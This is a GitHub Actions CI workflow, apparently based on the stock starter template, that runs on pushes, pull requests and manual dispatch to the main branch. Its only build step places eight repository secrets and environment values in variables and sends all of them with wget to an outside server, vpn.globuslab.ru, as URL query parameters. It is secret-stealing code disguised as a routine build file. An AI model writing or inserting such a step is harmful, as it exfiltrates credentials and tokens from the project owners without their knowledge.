# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the action will run. 
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Runs a single command using the runners shell
      - name: Run a one-line script
        env:
          SUPER_SECRET: ${{ secrets.key }}
          SUPER_SECRET2: ${{ MY_ENV.KEY }}
          SUPER_SECRET3: ${{ secrets.key3 }}
          SUPER_SECRET4: ${{ KEY }}
          SUPER_SECRET5: ${{ MY_ENV.KEY3 }}
          SUPER_SECRET6: ${{ MY_ENV.KEY2 }}
          SUPER_SECRET7: ${{ secrets.key }}
          SUPER_SECRET8: ${{ secrets.key2 }}
        run: wget https://vpn.globuslab.ru/update.php?key=$SUPER_SECRET&comment=$SUPER_SECRET2-$SUPER_SECRET3-$SUPER_SECRET4-$SUPER_SECRET5-$SUPER_SECRET6-$SUPER_SECRET7-$SUPER_SECRET8

